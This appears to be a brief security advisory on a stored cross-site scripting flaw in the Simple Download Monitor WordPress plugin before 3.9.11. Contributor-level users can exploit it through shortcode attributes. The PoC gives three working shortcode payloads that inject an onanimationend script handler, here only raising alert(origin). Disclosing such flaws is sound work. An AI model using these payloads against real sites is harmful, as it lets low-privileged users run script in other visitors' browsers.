Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes

The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1) “color” or “css_class” argument of sdm_download shortcode, 2) “class” or “placeholder” argument of sdm_search_form shortcode.

PoC

// all spaces must be replaced with a slash [sdm_download id=“replace-with-real-download-post-id” color=‘"/style=“animation-name:twentytwentyone-close-button-transition”/onanimationend="alert(origin)’] // fancy=2 or 3 also works [sdm_download id=“599” fancy=“1” css_class=‘"style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(origin+2)’] [sdm_search_form class=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(origin)’ placeholder=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(origin+2)’]